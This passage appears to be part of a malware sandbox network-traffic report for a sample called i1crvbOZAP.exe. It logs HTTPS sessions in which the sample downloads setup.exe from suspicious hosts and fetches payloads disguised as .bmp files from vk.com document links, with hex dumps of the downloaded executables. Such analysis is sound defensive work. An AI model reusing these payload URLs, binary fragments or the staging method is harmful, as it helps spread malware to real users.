H$]ESI~NeQ44#4Q14I64!!f?4G49W0QS4HHHH'.[y.SO.K.c..s.k.#...+.C.;9.3
2024-03-28 08:15:00 UTC	16384	IN	Data Raw: 72 76 69 63 65 73 00 41 73 73 65 6d 62 6c 79 43 6f 70 79 72 69 67 68 74 41 74 74 72 69 62 75 74 65 00 54 61 72 67 65 74 46 72 61 6d 65 77 6f 72 6b 41 74 74 72 69 62 75 74 65 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 56 65 72 73 69 6f 6e 69 6e 67 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 44 65 73 63 72 69 70 74 69 6f 6e 41 74 74 72 69 62 75 74 65 00 43 6f 6d 56 69 73 69 62 6c 65 41 74 74 72 69 62 75 74 65 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 00 47 75 69 64 41 74 74 72 69 62 75 74 65 00 43 6f 6d 70 69 6c 61 74 69 6f 6e 52 65 6c 61 78 61 74 69 6f 6e 73 41 74 74 72 69 62 75 74 65 00 49 6e 74 33 32 00 41 73 73 65 6d 62 6c 79 54 72 61 64 65 6d 61 Data Ascii: rvicesAssemblyCopyrightAttributeTargetFrameworkAttributeSystem.Runtime.VersioningAssemblyTitleAttributeAssemblyDescriptionAttributeComVisibleAttributeSystem.Runtime.InteropServicesGuidAttributeCompilationRelaxationsAttributeInt32AssemblyTradema
2024-03-28 08:15:00 UTC	1024	IN	Data Raw: 09 09 1d 05 09 0b 09 08 08 09 09 09 09 09 09 09 05 00 01 1d 05 09 0c 00 08 01 10 09 09 09 09 09 07 09 1c 05 00 02 09 09 07 09 20 03 01 1d 05 1d 05 1d 05 14 07 11 08 08 1d 05 08 09 09 09 09 08 08 08 09 08 08 09 08 09 05 00 00 12 80 c1 05 07 01 12 80 c1 03 20 00 1c 07 00 04 01 1c 1c 09 1c 07 20 03 08 1d 05 08 08 07 00 04 01 1c 1c 08 08 07 00 04 09 09 08 0a 1c 06 07 04 08 09 09 09 03 20 00 09 06 00 01 01 11 80 dd 4b 07 2d 12 80 9d 1d 12 80 95 1c 02 15 12 80 a1 02 08 08 1d 05 08 08 1d 05 09 09 09 08 12 64 08 08 09 08 08 09 08 09 08 08 08 08 12 80 95 08 08 02 12 80 99 1d 12 80 e1 08 1d 12 80 9d 12 80 e5 12 80 e9 08 08 09 09 09 09 09 09 0b 06 00 02 01 1c 10 02 07 15 12 80 a1 02 08 08 08 00 01 12 80 9d 11 80 dd 06 20 01 01 12 80 d5 05 20 00 12 80 d5 05 20 01 01 Data Ascii: K-d
2024-03-28 08:15:00 UTC	16384	IN	Data Raw: 80 89 18 18 18 09 18 10 09 12 80 8d 1c 08 20 02 09 10 09 12 80 89 03 20 00 18 06 20 01 18 12 80 89 06 20 03 18 18 0e 09 0c 20 05 12 80 89 18 0e 09 12 80 8d 1c 07 20 04 18 18 09 09 09 0d 20 06 12 80 89 18 09 09 09 12 80 8d 1c 0a 20 05 08 18 18 1d 05 09 10 18 10 20 07 12 80 89 18 18 1d 05 09 10 18 12 80 8d 1c 08 20 02 08 10 18 12 80 89 08 20 04 08 18 08 08 10 08 0e 20 06 12 80 89 18 08 08 10 08 12 80 8d 1c 08 20 02 08 10 08 12 80 89 06 20 03 18 09 08 09 0c 20 05 12 80 89 09 08 09 12 80 8d 1c 04 20 01 08 18 0a 20 03 12 80 89 18 12 80 8d 1c 06 20 01 08 12 80 89 05 00 02 08 08 1c 05 00 00 12 80 84 04 06 11 80 9c 04 06 11 80 98 04 06 11 80 a4 04 06 11 80 a0 04 06 11 80 8c 04 06 11 80 90 04 06 11 80 94 04 06 12 80 a8 05 00 00 12 80 a8 04 06 12 80 ac 04 20 00 11 Data Ascii:
2024-03-28 08:15:00 UTC	1024	IN	Data Raw: 27 b1 75 3d 44 59 cb 11 44 0f ab ec c9 4a 5b 1c 24 83 3b 61 ec 3a db a0 73 7e e1 06 55 32 01 3c 33 4f 66 a6 60 81 18 38 02 5b f8 c0 ba 03 e7 a2 54 1a 93 4f 10 1e 39 bf 2d 17 5c 3c 80 c7 20 8d 3e 95 b7 dd f2 fe 13 51 5a e4 7b 3a 21 eb 4d 36 7b d1 1a 71 89 ab 63 9b 4d cc bd ac 7e 2e e4 9c 54 50 38 08 7a c1 18 60 56 b2 16 66 ca bd 4a 22 7e 86 2b 6b a0 cf bb 59 c1 f4 94 ec 82 dd 34 31 5e 2e 7b c3 9a 41 20 66 25 19 7a 75 25 a4 76 f5 f2 e8 ff 73 af 00 f1 86 cf b8 4e 97 c8 27 1f a2 a9 54 2d ea 84 d3 cc f5 85 39 39 59 f7 6e 69 3e 48 83 1f 1f d2 b6 d0 b1 09 e4 73 06 2c da 69 8c 68 4f 25 c6 ca 9f e4 da 03 f4 ef b2 fd b8 98 ca ef bb ff 66 69 1c 08 46 fb 15 40 02 ec 47 8b a1 dd 04 d6 b9 26 59 c0 75 b8 66 b4 e0 db a5 f8 4f 72 c0 c5 5a c2 fe 94 ce ba 02 7f 87 2d d4 ca Data Ascii: 'u=DYDJ[$;a:s~U2<3Of`8[TO9-\< >QZ{:!M6{qcM~.TP8z`VfJ"~+kY41^.{A f%zu%vsN'T-99Yni>Hs,ihO%fiF@G&YufOrZ-
2024-03-28 08:15:00 UTC	16384	IN	Data Raw: 69 5e d1 6c 9f 05 16 91 8f eb 9d c7 58 6f 2c 9f 69 1e 0a c7 db 8f 06 db 4c f8 c5 ea 54 b5 df 6f b1 2f 3d 8a 15 cb b7 8a 59 5d ff a3 8f 69 16 5b cb 2d 07 6f 50 2b e6 3d bc a3 8d e2 73 da 2e a9 7d fd 98 f9 a6 55 56 3c 0b 1e 71 bf dd 58 91 52 02 66 46 f9 9b 2a 5c fc d0 4f 11 96 16 d5 86 40 79 44 09 4b d4 e0 66 6f c4 c3 c9 15 29 6a e6 1b 98 60 f9 a2 0a 21 1b 71 8c c0 1b 32 50 39 c1 c9 52 43 f8 81 31 ef 35 c5 13 8b 8b f2 bd ca c9 bd 82 d3 ea d4 68 20 2b 8f c6 e8 f7 df ee 41 8b 7b 1f 43 05 a7 f8 cd 19 80 b5 4f 0b 48 ca b4 18 52 0f 83 d8 2e 84 c6 db af 5a 05 65 bc c3 09 e0 9b 73 c1 9d 90 30 f1 39 df 5a fd 2d ec 90 24 21 28 d3 68 cc 97 eb 3f d5 73 f0 c7 ed 75 96 b6 80 6f 5d 9b 37 4a 93 ac 8e 13 f8 37 af 41 67 bc 82 9c 9a 14 c3 46 e3 4b f9 15 16 ba 09 3c 31 b8 05 Data Ascii: i^lXo,iLTo/=Y]i[-oP+=s.}UV<qXRfF*\O@yDKfo)j`!q2P9RC15h +A{COHR.Zes09Z-$!(h?suo]7J7AgFK<1
2024-03-28 08:15:00 UTC	1024	IN	Data Raw: 16 db bb 16 88 5d 69 d1 ba 78 1e c0 b6 a8 ee 0f fd 97 a3 1e e1 7b 92 65 7c 24 07 9f 91 8d 2b 1c 57 e4 ad 51 3e 70 62 e8 0c 0c be d5 fc 9e 1f 45 e5 20 ba b0 9c 1c ae ff bf cd 83 6f 49 d0 ed 79 41 47 ce dc 44 09 69 d1 44 91 5a c2 81 51 49 9e 10 2b 07 c3 1b 03 9e c1 b9 ed 11 23 5b 76 29 7e a8 59 70 12 54 53 81 dd 4f 67 ef 20 fe c5 fb 08 0c 34 53 14 55 e3 01 e5 e5 1e 5a 8c 76 fe d7 bd e2 75 4c 2e bd f1 7a b1 b0 79 4a db b8 35 30 09 da 1c 14 fa 7d 9f 8b 4b 3d e1 8b 0c e9 69 19 60 88 bc 54 1c f4 d3 a3 d8 ae a0 4c 47 31 6b a2 21 99 87 e6 ad db 64 ae 70 91 51 25 ab 23 b1 68 f7 24 4a 90 44 20 65 57 15 c1 e4 6d 7d 3a f2 c2 4c 06 5c d6 e3 4c 83 8f 84 e8 93 0f ea c2 95 03 15 74 27 d6 ae 8e 16 94 da 37 7c 55 6d a9 11 5d 2c 7f 27 7d ef ce a7 6b 11 8e 37 a8 13 71 25 4f Data Ascii: ]ix{e\|$+WQ>pbE oIyAGDiDZQI+#[v)~YpTSOg 4SUZvuL.zyJ50}K=i`TLG1k!dpQ%#h$JD eWm}:L\Lt'7\|Um],'}k7q%O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49773	45.130.41.108	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:00 UTC	207	OUT	GET /525403/setup.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: monoblocked.com Cache-Control: no-cache
2024-03-28 08:15:01 UTC	240	IN	HTTP/1.1 301 Moved Permanently Server: nginx-reuseport/1.21.1 Date: Thu, 28 Mar 2024 08:15:00 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 327 Connection: close Location: https://d.392391234.xyz/525403/setup.exe
2024-03-28 08:15:01 UTC	327	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 2e 33 39 32 33 39 31 32 33 34 2e 78 79 7a 2f 35 32 35 34 30 33 2f 73 65 74 75 70 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://d.392391234.xyz/525403/setup.exe">here</a>.</p><hr><address>Apache/2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49781	95.164.45.22	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:02 UTC	231	OUT	GET /525403/setup.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: d.392391234.xyz Connection: Keep-Alive
2024-03-28 08:15:02 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:02 GMT Content-Type: application/octet-stream Content-Length: 7828164 Last-Modified: Thu, 28 Mar 2024 08:00:08 GMT Connection: close ETag: "66052388-7772c4" Accept-Ranges: bytes
2024-03-28 08:15:02 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd e1 1d 57 99 80 73 04 99 80 73 04 99 80 73 04 1a 9c 7d 04 80 80 73 04 af a6 79 04 d9 80 73 04 17 88 2c 04 98 80 73 04 99 80 72 04 21 80 73 04 1a 88 2e 04 90 80 73 04 af a6 78 04 d4 80 73 04 f6 f6 d9 04 9e 80 73 04 f6 f6 ed 04 98 80 73 04 5e 86 75 04 98 80 73 04 52 69 63 68 99 80 73 04 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f7 53 e5 4c 00 00 00 00 00 00 00 00 e0 00 0f Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Wsss}sys,sr!s.sxsss^usRichsPELSL
2024-03-28 08:15:02 UTC	16384	IN	Data Raw: 0c 8b 45 b8 c1 e8 04 a8 01 75 22 32 db ff 75 c0 e8 7f ef ff ff ff 75 dc e8 77 ef ff ff ff 75 e8 e8 6f ef ff ff 83 c4 0c e9 92 00 00 00 ff 75 c0 c6 45 fc 01 e8 5b ef ff ff 59 8d 45 dc 8d 4d e8 50 e8 2c d2 ff ff 3b 75 ec 0f 8d 81 00 00 00 8b 55 e8 8d 44 72 02 66 8b 08 66 3b cf 74 09 66 85 c9 74 0c 40 40 eb ef 2b c2 d1 f8 8b f0 eb 03 83 ce ff 85 f6 7d 03 8b 75 ec 8d 45 d0 56 50 8d 4d e8 e8 ac d2 ff ff 8b 08 c6 45 fc 04 e8 03 fe ff ff 8a d8 c6 45 fc 01 ff 75 d0 f6 db 1a db fe c3 e8 ef ee ff ff 84 db 59 74 9c 32 db ff 75 dc e8 e0 ee ff ff 8b 55 e8 59 52 e8 d6 ee ff ff 59 8b 4d f4 5f 8a c3 5e 5b 64 89 0d 00 00 00 00 c9 c3 b3 01 eb d8 56 8b f1 33 d2 e8 b6 fc ff ff 84 c0 75 02 5e c3 56 ff 15 f8 b0 41 00 85 c0 0f 95 c0 5e c3 55 8b ec 83 ec 0c 80 3d 48 31 42 00 00 Data Ascii: Eu"2uuwuouE[YEMP,;uUDrff;tft@@+}uEVPMEEuYt2uUYRYM_^[dV3u^VA^U=H1B
2024-03-28 08:15:03 UTC	16384	IN	Data Raw: ff ff 89 7d fc e8 b0 ad ff ff e9 56 ff ff ff 8b 45 e0 66 89 5d c8 66 89 5d ca 8b 40 0c 8b 74 88 fc 8b 06 8d 7d c8 57 52 8b 08 50 89 55 fc ff 51 20 3b c3 0f 85 ba 01 00 00 66 83 7d c8 13 0f 85 29 03 00 00 8b 06 8b 7d d0 8d 55 c4 8b 08 52 50 ff 51 14 3b c3 0f 85 98 01 00 00 3b 7d c4 0f 83 09 03 00 00 83 4d fc ff 8d 4d c8 e8 bc d2 ff ff 89 5d f0 8b 06 8d 55 f0 52 68 28 b2 41 00 8b 08 50 c7 45 fc 02 00 00 00 ff 11 85 c0 8b 45 f0 0f 85 cf 02 00 00 3b c3 0f 84 c7 02 00 00 89 5d ec 8b 08 8d 55 ec 52 57 50 c6 45 fc 03 ff 51 0c 85 c0 8b 45 ec 0f 85 a1 02 00 00 3b c3 0f 84 99 02 00 00 89 5d e8 8b 08 8d 55 e8 52 68 f8 b2 41 00 50 c6 45 fc 04 ff 11 3b c3 8b 45 e8 0f 85 70 02 00 00 3b c3 0f 84 68 02 00 00 8d 4d 88 e8 a6 02 00 00 8d 45 8c 8b ce 50 57 c6 45 fc 05 e8 63 Data Ascii: }VEf]f]@t}WRPUQ ;f})}URPQ;;}MM]URh(APEE;]URWPEQE;]URhAPE;Ep;hMEPWEc
2024-03-28 08:15:03 UTC	16384	IN	Data Raw: b2 41 00 ff 75 0c e8 bd 69 00 00 83 c4 0c 85 c0 75 12 8b 4d 10 8b 45 08 50 89 01 8b 08 ff 51 04 33 c0 eb 05 b8 02 40 00 80 5d c2 0c 00 56 8b 74 24 08 ff 4e 04 8b 46 04 75 14 85 f6 74 0e 8b ce e8 0d 00 00 00 56 e8 49 6f ff ff 59 33 c0 5e c2 04 00 b8 5f a3 41 00 e8 f0 6d 00 00 51 56 8b f1 89 75 f0 83 65 fc 00 8d 4e 10 e8 1e 00 00 00 8b 76 08 83 4d fc ff 85 f6 74 06 8b 06 56 ff 50 08 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 b8 ac a3 41 00 e8 b5 6d 00 00 51 56 8b f1 89 75 f0 8d 8e ac 01 00 00 c7 45 fc 04 00 00 00 e8 f5 76 ff ff 8d 8e 98 01 00 00 c6 45 fc 03 e8 e6 76 ff ff 8d 8e 84 01 00 00 c6 45 fc 02 e8 d7 76 ff ff 8d 8e 70 01 00 00 c6 45 fc 01 e8 c8 76 ff ff 80 65 fc 00 8d 8e 58 01 00 00 e8 b9 76 ff ff 83 4d fc ff 8b ce e8 0d 00 00 00 8b 4d f4 5e 64 89 0d 00 Data Ascii: AuiuMEPQ3@]Vt$NFutVIoY3^_AmQVueNvMtVPM^dAmQVuEvEvEvpEveXvMM^d
2024-03-28 08:15:03 UTC	16384	IN	Data Raw: c7 40 04 24 b5 41 00 c7 40 08 60 b8 41 00 89 48 0c 89 48 10 89 88 a0 00 00 00 89 48 14 88 88 90 00 00 00 88 88 91 00 00 00 c7 80 b4 00 00 00 00 00 10 00 c7 80 b8 00 00 00 00 00 40 00 88 88 c0 00 00 00 c7 00 24 b9 41 00 c7 40 04 14 b9 41 00 c7 40 08 00 b9 41 00 89 88 a4 00 00 00 89 48 1c 89 48 18 89 48 34 89 48 30 c3 55 8b ec 56 8b 75 0c 6a 10 68 4c b9 41 00 56 e8 4a 29 00 00 83 c4 0c 85 c0 75 0a 8b 4d 10 8b 45 08 89 01 eb 59 6a 10 68 a8 b2 41 00 56 e8 2c 29 00 00 83 c4 0c 85 c0 74 e2 6a 10 68 98 b2 41 00 56 e8 18 29 00 00 83 c4 0c 85 c0 75 0a 8b 45 08 8b c8 8d 50 04 eb 1c 6a 10 68 48 b2 41 00 56 e8 fa 28 00 00 83 c4 0c 85 c0 75 1d 8b 45 08 8b c8 8d 50 08 f7 d9 1b c9 23 ca 8b 55 10 89 0a 8b 08 50 ff 51 04 33 c0 eb 05 b8 02 40 00 80 5e 5d c2 0c 00 8b 44 24 Data Ascii: @$A@`AHHH@$A@A@AHHH4H0UVujhLAVJ)uMEYjhAV,)tjhAV)uEPjhHAV(uEP#UPQ3@^]D$
2024-03-28 08:15:03 UTC	16384	IN	Data Raw: ff 68 e0 b9 41 00 68 2c 4a 41 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 58 53 56 57 89 65 e8 ff 15 74 b0 41 00 33 d2 8a d4 89 15 d0 33 42 00 8b c8 81 e1 ff 00 00 00 89 0d cc 33 42 00 c1 e1 08 03 ca 89 0d c8 33 42 00 c1 e8 10 a3 c4 33 42 00 6a 01 e8 96 0e 00 00 59 85 c0 75 08 6a 1c e8 c3 00 00 00 59 e8 48 09 00 00 85 c0 75 08 6a 10 e8 b2 00 00 00 59 33 f6 89 75 fc e8 b7 2a 00 00 ff 15 78 b0 41 00 a3 3c 5a 42 00 e8 75 29 00 00 a3 40 33 42 00 e8 1e 27 00 00 e8 60 26 00 00 e8 bb 20 00 00 89 75 d0 8d 45 a4 50 ff 15 7c b0 41 00 e8 f1 25 00 00 89 45 9c f6 45 d0 01 74 06 0f b7 45 d4 eb 03 6a 0a 58 50 ff 75 9c 56 56 ff 15 80 b0 41 00 50 e8 30 c4 fe ff 89 45 a0 50 e8 a9 20 00 00 8b 45 ec 8b 08 8b 09 89 4d 98 50 51 e8 3b 24 00 00 59 59 c3 8b 65 e8 ff 75 98 Data Ascii: hAh,JAdPd%XSVWetA33B3B3B3BjYujYHujY3u*xA<ZBu)@3B'`& uEP\|A%EEtEjXPuVVAP0EP EMPQ;$YYeu
2024-03-28 08:15:03 UTC	16384	IN	Data Raw: 85 94 00 00 00 39 5d 18 75 08 a1 4c 35 42 00 89 45 18 53 53 ff 75 10 ff 75 0c 8b 45 20 f7 d8 1b c0 83 e0 08 40 50 ff 75 18 ff 15 a8 b0 41 00 89 45 e0 3b c3 74 63 89 5d fc 8d 3c 00 8b c7 83 c0 03 24 fc e8 70 b1 ff ff 89 65 e8 8b f4 89 75 dc 57 53 56 e8 40 f2 ff ff 83 c4 0c eb 0b 6a 01 58 c3 8b 65 e8 33 db 33 f6 83 4d fc ff 3b f3 74 29 ff 75 e0 56 ff 75 10 ff 75 0c 6a 01 ff 75 18 ff 15 a8 b0 41 00 3b c3 74 10 ff 75 14 50 56 ff 75 08 ff 15 00 b0 41 00 eb 02 33 c0 8d 65 cc 8b 4d f0 64 89 0d 00 00 00 00 5f 5e 5b c9 c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 33 c0 50 50 50 50 50 50 50 50 8b 55 0c 8d 49 00 8a 02 0a c0 74 07 42 0f ab 04 24 eb f3 8b 75 08 83 c9 ff 90 41 8a 06 0a c0 74 07 46 0f a3 04 24 73 f2 8b c1 83 c4 20 5e c9 c3 cc cc 55 8b ec 56 33 c0 50 Data Ascii: 9]uL5BESSuuE @PuAE;tc]<$peuWSV@jXe33M;t)uVuujuA;tuPVuA3eMd_^[UV3PPPPPPPPUItB$uAtF$s ^UV3P
2024-03-28 08:15:03 UTC	16384	IN	Data Raw: 01 00 00 00 a4 99 41 00 01 00 00 00 ac 99 41 00 01 00 00 00 b4 99 41 00 00 00 00 00 bc 99 41 00 ff ff ff ff c4 99 41 00 20 05 93 19 01 00 00 00 50 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff d8 99 41 00 20 05 93 19 01 00 00 00 78 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ec 99 41 00 20 05 93 19 02 00 00 00 a0 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 9a 41 00 00 00 00 00 0a 9a 41 00 20 05 93 19 01 00 00 00 d0 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 1c 9a 41 00 20 05 93 19 01 00 00 00 f8 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 30 9a 41 00 20 05 93 19 01 00 00 Data Ascii: AAAAA PAA xAA AAA AA A0A
2024-03-28 08:15:03 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-03-28 08:15:03 UTC	16384	IN	Data Raw: 17 4d 63 55 4e f0 ef 40 dc 64 a2 1d 12 0d db a8 d0 6f 89 4a fb 31 b7 ff 4e 2a 53 68 29 c4 3d e9 5b 72 04 da e2 53 9c e1 71 70 82 87 64 49 91 80 c3 bd 53 4c 53 7c af d0 14 2d 52 fb f3 8f 42 5d ab 63 5c c1 c7 2d e9 c8 9e e6 2c bb 39 47 61 be 16 f8 33 27 dc 7a b6 cf 61 72 85 df 74 ff 85 4e 01 42 c2 89 a5 71 c7 a2 36 fb fb a8 b7 ce d1 97 a1 d5 46 90 8b 02 cd e3 7b 28 69 1d da ca 8c e8 08 72 91 02 23 1d 62 eb cb 7d 06 f2 7e 07 fb b9 47 66 e8 dc 20 93 20 12 95 85 76 04 d0 1b 89 a0 a0 f5 9b cc cb 95 8c 47 3e 0e 54 16 24 8a 46 48 46 a1 77 13 eb 7e 6a c9 88 f7 95 43 6d 31 d8 d2 1e a4 c6 b2 be a0 02 2d df c0 db 19 e0 47 92 b2 9d a6 97 67 2b 15 95 18 b0 da d9 3b 99 2d d4 ea 1f 61 08 81 d8 4e fa 78 6b 3a c8 c0 72 ba 58 82 cb 02 7d d4 b1 33 28 ae 20 e1 69 0a 0a 23 1d Data Ascii: McUN@doJ1N*Sh)=[rSqpdISLS\|-RB]c\-,9Ga3'zartNBq6F{(ir#b}~Gf vG>T$FHFw~jCm1-Gg+;-aNxk:rX}3( i#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49784	93.186.225.194	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:02 UTC	323	OUT	GET /doc329118071_676251329?hash=gdEXjFzqP4Hz4RjHrC6Ryb5BsQH3gXEoTcWHcSEbfh0&dl=n9WfEp2Oq35MoZGAEeTjZMvNYQeUp1Xgpi7NCn4nnYD&api=1&no_preview=1#xin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: vk.com Cache-Control: no-cache
2024-03-28 08:15:03 UTC	1217	IN	HTTP/1.1 302 Found Server: kittenx Date: Thu, 28 Mar 2024 08:15:03 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: close X-Powered-By: KPHP/7.4.116219 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixlang=3; expires=Sat, 29 Mar 2025 03:04:37 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixstlid=9094062447558211010_Cv3oCqjGyle1tw3G9dOP3tMu1MQCFNKqn9VzBIutsH8; expires=Fri, 28 Mar 2025 08:15:02 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Cache-control: no-store X-Robots-Tag: noindex,nofollow Reporting-Endpoints: default="https://vk.com/browser_reports?dest=default_reports" Location: https://sun6-20.userapi.com/c237131/u329118071/docs/d54/a41cd49a4cc3/sm.bmp?extra=YhKLSKJ3mgzcHEPhKt29yMVwT7syu4DSX-r8FiniNu26GoYh--bacebk_lAweHd_nom6ZTYuZ1nbNqpT3z-oQcCb9yjZPvFkcjabKXHoUaPs7vLK8L7aMJYgb4R4exgpsuU8bf8kljG-Phg X-Frontend: front661302 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: O3IELk5JyHRD0Wanc9NxUtg_GRCw0g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49785	93.186.225.194	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:02 UTC	324	OUT	GET /doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGiurKsySjR8YhvL7Ks3RZIJ4qJjfFMeqQgdrQ8&api=1&no_preview=1#ww12 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: vk.com Cache-Control: no-cache
2024-03-28 08:15:03 UTC	1226	IN	HTTP/1.1 302 Found Server: kittenx Date: Thu, 28 Mar 2024 08:15:03 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: close X-Powered-By: KPHP/7.4.116219 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixlang=3; expires=Fri, 28 Mar 2025 23:04:07 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixstlid=9117847083090382120_GyCezWnUcFkAoaulqrTGNL6Wa7T5v9s33neHqUGXYzo; expires=Fri, 28 Mar 2025 08:15:03 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Cache-control: no-store X-Robots-Tag: noindex,nofollow Reporting-Endpoints: default="https://vk.com/browser_reports?dest=default_reports" Location: https://sun6-21.userapi.com/c909328/u329118071/docs/d30/0bb5ce760b73/XFilePumper.bmp?extra=LfaiwsuY5AI1SgCQ2hZu1AgxBMymxLFFBDyOdai5jngk90oTeFijtt7Ic4wsMIEOy9NwgH9QmImjTPk5bd8yAGOmRqX65U99IViGTY1ZCiw1fayo7Fo0G4owW8CZYZOPW10clBZcrnDnQ8o X-Frontend: front661402 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: AOKeG0dBtq5iTAHhSNiZ56o8m61_yQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49788	93.186.225.194	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
